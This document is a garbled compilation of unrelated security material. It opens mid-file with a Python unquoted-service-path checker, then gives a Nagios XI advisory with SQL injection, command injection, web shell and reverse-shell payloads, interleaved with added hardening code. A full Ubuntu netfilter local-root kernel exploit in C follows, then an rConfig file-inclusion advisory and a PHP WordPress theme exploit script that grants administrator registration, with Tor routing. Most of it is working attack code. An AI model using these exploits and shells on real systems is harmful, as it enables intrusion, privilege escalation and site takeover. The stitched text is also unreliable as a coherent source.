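# ones sc.exe prints, the path is the example given in the advisory.
SAMPLE_SC_QC = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: lolscreensaver
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : D:\\My Games\\Hidden Files\\Super Secure\\Riot Games\\service\\service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : League of Legends Screensaver
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def binary_path_from_sc_qc(text):
    """Extract the BINARY_PATH_NAME value from `sc qc` output (None if absent)."""
    match = re.search(r"^\s*BINARY_PATH_NAME\s*:\s*(.*?)\s*$", text, re.MULTILINE)
    return match.group(1) if match else None


def is_quoted(image_path):
    """A safely configured path wraps the executable in double quotes."""
    return image_path.startswith('"')


def spoofable_paths(image_path):
    """Return [(executable Windows would try, directory that must not be writable), ...].

    With an unquoted path containing spaces, the service manager treats each
    space as a possible end of the executable name and tries the prefixes in
    order. Any prefix a non-admin user can create runs as SYSTEM, which is
    exactly what the icacls checks in the advisory are looking for.
    Returns an empty list when the path is quoted or contains no spaces.
    """
    if is_quoted(image_path) or " " not in image_path:
        return []
    tokens = image_path.split(" ")
    # The real binary ends at the first token carrying the .exe suffix; tokens
    # after it are service arguments and add no further candidates.
    end = next((i for i, t in enumerate(tokens) if t.lower().endswith(".exe")),
               len(tokens) - 1)
    candidates = []
    for i in range(1, end + 1):
        prefix = " ".join(tokens[:i])
        exe = prefix if prefix.lower().endswith(".exe") else prefix + ".exe"
        directory = exe.rsplit("\\", 1)[0] + "\\"
        candidates.append((exe, directory))
    return candidates


def directories_to_audit(image_path):
    """Distinct parent directories, root first, to run `icacls` against."""
    seen = []
    for _, directory in spoofable_paths(image_path):
        if directory not in seen:
            seen.append(directory)
    return seen


if __name__ == "__main__":
    path = binary_path_from_sc_qc(SAMPLE_SC_QC)
    print("BINARY_PATH_NAME:", path)
    print("quoted:", is_quoted(path))
    for exe, directory in spoofable_paths(path):
        print("  would try %-58s (check ACL on %s)" % (exe, directory))
```

Quoting the path in the service configuration (or installing under a directory only administrators can write to) makes the list empty, which is the remediation the advisory points at.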
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Nagios XI Multiple Vulnerabilities
Affected versions: Nagios XI <= 5.2.7
PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf
+-----------+
|Description|
+-----------+
The Nagios XI application is affected by multiple security
vulnerabilities, including unauthenticated SQL injection and
authentication bypass, arbitrary code execution via command injection,
privilege escalation, server-side request forgery and account hijacking.
These vulnerabilities can be chained together to obtain unauthenticated
remote code execution as the root user.
+------------+
|Exploitation|
+------------+
==SQL Injection==
The ‘host’ and ‘service’ GET parameters in the ‘nagiosim.php’ page are
vulnerable to SQL injection via error-based payloads. An attacker can
exploit this vulnerability to retrieve sensitive information from the
application’s MySQL database such as the administrative users’ password
hash (unsalted MD5) or the token used to authenticate to the Nagios XI
REST API. This security issue is aggravated by the fact that an attacker
can directly browse to the vulnerable page and exploit the vulnerability
without providing a valid session cookie.
[POC - DUMP ADMIN API TOKEN]
GET
/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service='+AND+
(SELECT+1+FROM(SELECT+COUNT(*),CONCAT('|APIKEY|',(SELECT+MID((IFNULL(CAST(backend_ticket+AS
+CHAR),0x20)),1,54)+FROM+xi_users+WHERE+user_id%3d1+LIMIT+0,1),'|APIKEY|',FLOOR(RAND(0)*2))
x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+OR+' HTTP/1.1
The API token can be reused to bypass authentication either by creating
a user via the REST API or through the Rapid Response functionality as
shown below.
[POC- BYPASS AUTHENTICATION THROUGH RAPID RESPONSE FUNCTIONALITY]
// uid == <user_id>-<object_id>-<MD5(api token)>, object id value
doesn't matter
GET /nagiosxi/rr.php?uid=1-b-<hash> HTTP/1.1
==Command Injection==
Multiple command injection vulnerabilities exist in the Nagios XI web
interface due to unescaped user input being passed to shell functions as
an argument. These issues can be exploited to inject arbitrary shell
commands and obtain remote code execution in the context of the 'apache'
user.
URL => GET
/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=<api
token>&incident_id=<valid incident id>&title=<PAYLOAD>&status=<any value>
PARAMETER => title
POC PAYLOAD => title'; touch /tmp/FILE; echo '
URL => GET
/nagiosxi/includes/components/perfdata/graphApi.php?host=<any monitored
host IP>&start=<PAYLOAD>&end=<PAYLOAD>
PARAMETERS => start, end
POC PAYLOAD => 1; touch /tmp/FILE;
==Privilege Escalation==
The Nagios XI default sudoers configuration can be abused to elevate
privileges to root due to an insecure implementation of the
application’s component upload functionality. The ‘apache’ user can run
the getprofile.sh script with root privileges without being prompted for
a password. The getprofile.sh script is part of the Profile component
along with the following files:
- profile.php, the PHP script that outputs the system information.
- profile.inc.php, a PHP include file with required functionality for
profile.php.
An attacker can backdoor the profile.php file with a function to execute
arbitrary shell commands (e.g. <?php system($_GET['cmd']); ?> ), replace
the getprofile.sh file with a malicious payload (e.g. “#!/bin/bash bash
–i >& /dev/tcp/<IP>/<PORT> 0>&1”) and finally create a ‘profile.zip’
archive containing the malicious component files. Once uploaded, the
application will unzip the component archive and overwrite the existing
profile directory and its files, including getprofile.sh.
[POC - MALICIOUS 'profile.zip' COMPONENT ARCHIVE]
[POC - PRIVILEGE ESCALATION EXPLOITATION]
GET /nagiosxi/includes/components/profile/profile.php?cmd=sudo
./getprofile.sh
The default Profile component archive can be downloaded at the following
link:
https://assets.nagios.com/downloads/nagiosxi/components/profile.zip
==Server-Side Request Forgery==
Multiple server-side request forgery vulnerabilities exist in the Nagios
XI application. An attacker can provide arbitrary data to curl_exec
calls to port scan internal services listening on localhost, read files
on the Nagios XI server file system or send data to other hosts in the
same internal network where the Nagios XI server is deployed.
// the application's filter on the string 'file://' can be bypassed by
// converting the scheme to uppercase
URL => GET /nagiosxi/ajaxproxy.php?proxyurl=<PAYLOAD>
PARAMETER => proxyurl
POC PAYLOAD => FILE:///<path>/<file>
URL => GET /nagiosxi/backend/?cmd=geturlhtml&url=<PAYLOAD>
PARAMETER => url
POC PAYLOAD => file:///<path>/<file>
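The blacklist-versus-allowlist point is the whole lesson of this section. As an added example (not Nagios XI code), the weak check the advisory describes is shown beside a Python validator that lowercases the scheme, allows only http(s), and refuses loopback, private and otherwise non-routable destinations, which closes the FILE:// bypass and the localhost port-scan vector in one place. The `resolve` callback and the `stub_resolve` table are assumptions for the demo.

```python
import ipaddress
from urllib.parse import urlsplit


def weak_proxy_filter(url):
    """The check the advisory describes: a case-sensitive substring blacklist.

    Returns True when the URL would be fetched. 'FILE://' slips through.
    """
    return "file://" not in url


ALLOWED_SCHEMES = {"http", "https"}


def hardened_proxy_filter(url, resolve=None):
    """Allowlist validator for a server-side fetch. Returns (ok, reason).

    `resolve` maps a hostname to an IP string. Without it only IP literals
    are accepted; a deployment passes its own resolver and must then connect
    to the address it validated (otherwise DNS rebinding undoes the check).
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()      # urlsplit lowercases already; be explicit
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % scheme
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        if resolve is None:
            return False, "hostnames need a resolver"
        try:
            addr = ipaddress.ip_address(resolve(host))
        except (ValueError, TypeError, KeyError):
            return False, "unresolvable host"
    if (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified):
        return False, "destination %s is not externally routable" % addr
    return True, "ok"


def stub_resolve(host):
    """Constructed resolver table standing in for DNS during the demo."""
    return {"status.example": "93.184.216.34", "intranet.example": "10.0.0.5"}[host]


def compare(urls, resolve=None):
    """Side-by-side verdicts: (url, weak filter allows, hardened filter allows)."""
    return [(u, weak_proxy_filter(u), hardened_proxy_filter(u, resolve)[0]) for u in urls]


if __name__ == "__main__":
    # Constructed samples; the first two are the vectors the advisory names.
    samples = [
        "FILE:///etc/passwd",
        "http://127.0.0.1:22/",
        "http://192.168.10.5:8080/admin",
        "http://[::1]/",
        "http://intranet.example/",
        "http://status.example/",
    ]
    for url, weak, hard in compare(samples, stub_resolve):
        print("%-34s weak=%-5s hardened=%s" % (url, weak, hard))
```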
==Account Hijacking==
The Nagios XI application is vulnerable to an arbitrary account
hijacking vulnerability due to an insecure implementation of the
password reset functionality. The application does not enforce any
verification to confirm the provided reset token can only be used to
change the login credentials for the specific user for which it was
generated. A limited user can therefore abuse the password reset
functionality to hijack an administrative account by tampering with the
‘username’ hidden parameter during the password reset process.
[POC - ACCOUNT HIJACKING 'nagiosadmin']
POST /nagiosxi/login.php?finishresetpass&username=stduser&token=<reset token> HTTP/1.1
token=<reset token>&username=nagiosadmin&password1=<PASSWORD>&password2=<PASSWORD>&reset=1
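As an added example (not Nagios XI code), here is the binding check the advisory says is missing, in Python: the reset token is stored together with the account it was issued for, and the finishing step compares that stored account to the submitted username, so the tampered request above fails even though the token itself is valid. The in-memory token table and the TTL are assumptions for the demo.

```python
import hmac
import secrets
import time

# In-memory stand-in for the reset-token table; a real deployment keeps the
# same two columns (issued-for username, expiry) next to the token in its DB.
_RESET_TOKENS = {}          # token -> {"username": ..., "expires": ...}
TOKEN_TTL_SECONDS = 3600


def issue_reset_token(username, now=None):
    """Create a single-use token and record which account it was issued for."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    _RESET_TOKENS[token] = {"username": username, "expires": now + TOKEN_TTL_SECONDS}
    return token


def finish_reset(token, username, password1, password2, now=None):
    """Validate a finishresetpass request. Returns (ok, reason).

    The step the advisory says was absent is the username binding: the
    account being changed must be the one the token was issued for, no
    matter what the client-controlled username field claims.
    """
    now = time.time() if now is None else now
    record = _RESET_TOKENS.get(token)
    if record is None:
        return False, "unknown token"
    if now > record["expires"]:
        _RESET_TOKENS.pop(token, None)
        return False, "token expired"
    # Constant-time compare so a mismatch leaks nothing about valid usernames.
    if not hmac.compare_digest(record["username"].encode(), username.encode()):
        return False, "token was not issued for this account"
    if not password1 or password1 != password2:
        return False, "passwords do not match"
    _RESET_TOKENS.pop(token, None)      # single use: a replay must fail
    return True, "password reset for %s" % record["username"]


def demo():
    """Replays the advisory's scenario: stduser's token sent with username=nagiosadmin."""
    token = issue_reset_token("stduser")
    hijack = finish_reset(token, "nagiosadmin", "Secret1!", "Secret1!")
    legit = finish_reset(token, "stduser", "Secret1!", "Secret1!")
    replay = finish_reset(token, "stduser", "Secret1!", "Secret1!")
    return hijack, legit, replay


if __name__ == "__main__":
    for verdict in demo():
        print(verdict)
```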
+----------+
| Solution |
+----------+
Upgrade to Nagios XI 5.2.8.
Please note that at the time of this writing the privilege escalation
vulnerability is still unpatched. The SSRF vulnerabilities have been
only partially fixed by blacklisting the 'file://' handler, and all the
other SSRF attack vectors are still exploitable. The vendor stated that
these vulnerabilities will likely be patched in the next release of the
application, as they require authentication and as such are not
considered major security issues.
+------------+
| Timeline |
+------------+
13/05/2016 – Initial disclosure to vendor
14/05/2016 – Vendor confirms receipt of advisory
25/05/2016 – Vendor provides fixes for most of the vulnerabilities
25/05/2016 – Enquiry about the status of fixes for the unpatched
vulnerabilities
26/05/2016 – Vendor responded with “Since the major issues have been
fixed and the remaining issues I'd like to touch up are only available
if the user is logged in, or logged in as admin, I don't see a reason to
hold onto releasing the advisory.”
2/06/2016 – Public disclosure
+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf
/*
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40053.zip
*/
--------------------------------------------------- decr.c ---------------------------------------------------
/**
* Ubuntu 16.04 local root exploit - netfilter target_offset OOB
* check_compat_entry_size_and_hooks/check_entry
*
* Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
*
* Vitaly Nikolenko
* vnik@cyseclabs.com
* 23/04/2016
*
*
* ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
* automatic loading).
*
* vnik@ubuntu:~$ uname -a
* Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
* vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
* vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
* vnik@ubuntu:~$ ./decr
* netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
* [!] Decrementing the refcount. This may take a while...
* [!] Wait for the "Done" message (even if you'll get the prompt back).
* vnik@ubuntu:~$ [+] Done! Now run ./pwn
*
* vnik@ubuntu:~$ ./pwn
* [+] Escalating privs...
* root@ubuntu:~# id
* uid=0(root) gid=0(root) groups=0(root)
* root@ubuntu:~#
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <linux/sched.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ptrace.h>
#include <netinet/in.h>
#include <net/if.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <sys/mman.h>

#define MALLOC_SIZE 66*1024

/* Returns -1 when /proc/cpuinfo advertises SMEP or SMAP (this variant cannot bypass them). */
int check_smaep() {
    FILE *proc_cpuinfo;
    char fbuf[512];

    proc_cpuinfo = fopen("/proc/cpuinfo", "r");
    if (proc_cpuinfo == NULL) {      /* fopen() returns NULL on failure, not a negative value */
        perror("fopen");
        return -1;
    }

    memset(fbuf, 0, sizeof(fbuf));
    while (fgets(fbuf, 512, proc_cpuinfo) != NULL) {
        if (strlen(fbuf) == 0)
            continue;

        if (strstr(fbuf, "smap") || strstr(fbuf, "smep")) {
            fclose(proc_cpuinfo);
            return -1;
        }
    }

    fclose(proc_cpuinfo);
    return 0;
}

/* Returns 0 when ip_tables is listed in /proc/modules, -1 otherwise. */
int check_mod() {
    FILE *proc_modules;
    char fbuf[256];

    proc_modules = fopen("/proc/modules", "r");
    if (proc_modules == NULL) {      /* same NULL check as above */
        perror("fopen");
        return -1;
    }

    memset(fbuf, 0, sizeof(fbuf));
    while (fgets(fbuf, 256, proc_modules) != NULL) {
        if (strlen(fbuf) == 0)
            continue;

        if (!strncmp("ip_tables", fbuf, 9)) {
            fclose(proc_modules);
            return 0;
        }
    }

    fclose(proc_modules);
    return -1;
}

int decr(void *p) {
    int sock, optlen;
    int ret;
    void *data;
    struct ipt_replace *repl;
    struct ipt_entry *entry;
    struct xt_entry_match *ematch;
    struct xt_standard_target *target;
    unsigned i;

    sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);

    if (sock == -1) {
        perror("socket");
        return -1;
    }

    data = malloc(MALLOC_SIZE);

    if (data == NULL) {
        perror("malloc");
        return -1;
    }

    memset(data, 0, MALLOC_SIZE);

    repl = (struct ipt_replace *) data;
    repl->num_entries = 1;
    repl->num_counters = 1;
    repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
    repl->valid_hooks = 0;

    entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
    entry->target_offset = 74;      // overwrite target_offset
    entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);

    ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));

    strcpy(ematch->u.user.name, "icmp");
    void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
    uint64_t *me = (uint64_t *)(kmatch + 0x58);
    *me = 0xffffffff821de10d;       // magic number!

    uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
    *match = (uint32_t)kmatch;

    ematch->u.match_size = (short)0xffff;

    target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
    uint32_t *t = (uint32_t *)target;
    *t = (uint32_t)kmatch;

    printf("[!] Decrementing the refcount. This may take a while...\n");
    printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");

    for (i = 0; i < 0xffffff/2+1; i++) {
        ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
    }

    close(sock);
    free(data);

    printf("[+] Done! Now run ./pwn\n");

    return 0;
}

int main(void) {
    void *stack;
    int ret;

    printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n");

    if (check_mod()) {
        printf("[-] No ip_tables module found! Quitting...\n");
        return -1;
    }

    if (check_smaep()) {
        printf("[-] SMEP/SMAP support detected! Quitting...\n");
        return -1;
    }

    /* New user namespace so the unprivileged caller may create a network namespace. */
    ret = unshare(CLONE_NEWUSER);

    if (ret == -1) {
        perror("unshare");
        return -1;
    }

    stack = (void *) malloc(65536);

    if (stack == NULL) {
        perror("malloc");
        return -1;
    }

    clone(decr, stack + 65536, CLONE_NEWNET, NULL);

    sleep(1);
    return 0;
}
--------------------------------------------------- pwn.c ---------------------------------------------------
/**
 * Run ./decr first!
 *
 * 23/04/2016
 * - vnik
 */

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>

#define MMAP_ADDR 0xff814e3000
#define MMAP_OFFSET 0xb0

typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);
typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);

void __attribute__((regparm(3))) privesc() {
    commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
    prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
    commit_creds(prepare_kernel_cred((uint64_t)NULL));
}

int main() {
    void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);
    assert(payload == (void *)MMAP_ADDR);

    void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);
    memset(shellcode, 0, 0x300000);

    void *ret = memcpy(shellcode, &privesc, 0x300);
    assert(ret == shellcode);

    printf("[+] Escalating privs...\n");

    int fd = open("/dev/ptmx", O_RDWR);
    close(fd);

    assert(!getuid());

    printf("[+] We've got root!\n");

    return execl("/bin/bash", "-sh", NULL);
}
Title
===================
rConfig, the open source network device configuration management tool, Vulnerable to Local File Inclusion
Summary
===================
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server.
Affected Products
===================
rConfig 3.1.1 and earlier
CVE
===================
N/A
Details
===================
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server. This is because downloadFile.php does not check the download_file parameter before it uses it. It merely opens and sends the file in the parameter to the user. As long as the account running the web server has access to it, rConfig will open it and send it.
Verification of Vulnerability
===================
The following steps can be carried out in duplicating this vulnerability.
Step 1:
Enter the following into your browser address bar:
http://<SERVER>/lib/crud/downloadFile.php?download_file=/etc/passwd
Step 2:
Confirm that the passwd file is valid
Impact
===================
Information Disclosure. User privileges and unauthorized access to the system.
Credits
===================
Gregory Pickett (@shogun7273), Hellfire Security
<?php
/**
 * Exploit Title: Newspaper WP Theme Exploit
 * Google Dork:
 * Exploit Author: wp0Day.com <contact@wp0day.com>
 * Vendor Homepage: http://tagdiv.com/newspaper/
 * Software Link: http://themeforest.net/item/newspaper/5489609
 * Version: 6.7.1
 * Tested on: Debian 8, PHP 5.6.17-3
 * Type: WP Options Overwrite, Possible more
 * Time line: Found [23-APR-2016], Vendor notified [23-APR-2016], Vendor fixed: [27-APR-2016], [RD:1]
 */

require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');

$curl = new CurlWrapper();
$options = getopt("t:m:u:p:f:c:", array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options) {
    showHelp();
}

if ($options['tor'] === true) {
    echo " ### USING TOR ###\n";
    echo "Setting TOR Proxy...\n";
    $curl->addOption(CURLOPT_PROXY, "http://127.0.0.1:9150/");
    $curl->addOption(CURLOPT_PROXYTYPE, 7);
    echo "Checking IPv4 Address\n";
    $curl->get('https://dynamicdns.park-your-domain.com/getip');
    echo "Got IP : " . $curl->getResponse() . "\n";
    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
    $answer = fgets(fopen("php://stdin", "r"));
    if (trim($answer) != 'wololo') {
        die("Aborting!\n");
    }
    echo "OK...\n";
}

function exploit() {
    global $curl, $options;
    switch ($options['m']) {
        case "admin_on":
            echo "Setting default role to Administrator \n";
            $data = array('action' => 'td_ajax_update_panel', 'wp_option[default_role]' => 'administrator');
            break;
        case "admin_off":
            echo "Setting default role to Subscriber \n";
            $data = array('action' => 'td_ajax_update_panel', 'wp_option[default_role]' => 'subscriber');
            break;
        case "reg_on":
            echo "Enabling registrations\n";
            $data = array('action' => 'td_ajax_update_panel', 'wp_option[users_can_register]' => '1');
            break;
        case "reg_off":   // was a duplicated "reg_on" label, which left this branch unreachable
            echo "Disabling registrations\n";
            $data = array('action' => 'td_ajax_update_panel', 'wp_option[users_can_register]' => '0');
            break;
    }
    $curl->post($options['t'] . '/wp-admin/admin-ajax.php', $data);
    $resp = $curl->getResponse();
    echo "Response: " . $resp . "\n";
}

exploit();

function validateInput($options) {
    if (!isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL)) {
        return false;
    }
    if (!preg_match('~/$~', $options['t'])) {
        $options['t'] = $options['t'] . '/';
    }
    if (!isset($options['m']) || !in_array($options['m'], array('admin_on', 'reg_on', 'admin_off', 'reg_off'))) {
        return false;
    }
    $options['tor'] = isset($options['tor']);
    return $options;
}

function showHelp() {
    global $argv;
    $help = <<<EOD
Newspaper WP Theme Exploit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE]
[TARGET_URL] http://localhost/wordpress/
[MODE] admin_on - Default admin level on reg. admin_off - Default subscriber on reg.
reg_on - Turns on user registration. reg_off - Turns off user registrations.
Turn on registrations, set default level to admin, register a user on the website,
turn off admin mode, turn off user registrations.
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -m admin_on
[Register a new user as Admin]
php $argv[0] -t http://localhost/wordpress --tor=yes -m admin_off
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
    echo $help . "\n\n";
    die();
}